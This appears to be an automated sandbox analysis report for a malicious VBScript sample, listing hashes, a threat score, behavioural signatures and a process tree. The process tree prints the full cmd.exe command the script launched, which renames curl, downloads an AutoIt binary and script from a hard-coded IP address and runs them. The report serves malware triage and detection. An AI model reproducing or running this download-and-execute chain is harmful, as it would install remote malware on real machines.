Analysis
-
max time kernel
42s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
27/09/2023, 09:46
Static task
static1
Behavioral task
behavioral1
Sample
1.vbs
Resource
win7-20230831-en
4 signatures
150 seconds
General
-
Target
1.vbs
-
Size
1KB
-
MD5
95f1a044adb17a561ca70b168ff37708
-
SHA1
7d43e2db9cb63b91468a442acd60ceda4045eb8b
-
SHA256
f1ae3678094d1318cb052009429fb96caec758ce3238ea10decd5df8db84a8a1
-
SHA512
3cb9df7b775e4aba2a5696e7b176efa64ea15d243bdea2dd8e3e8cf79ed5be14f5063da7e8d6861ddd72598b688dda3c0678e1bfa42a9d5ecd35233369181040
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 1708 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1708 wrote to memory of 2660 1708 WScript.exe 29 PID 1708 wrote to memory of 2660 1708 WScript.exe 29 PID 1708 wrote to memory of 2660 1708 WScript.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\fqrb & cd /d c:\fqrb & copy c:\windows\system32\curl.exe fqrb.exe & fqrb -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & fqrb -o ifnwot.au3 http://5.188.87.58:2351/msifqrbjoet & Autoit3.exe ifnwot.au32⤵PID:2660
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2932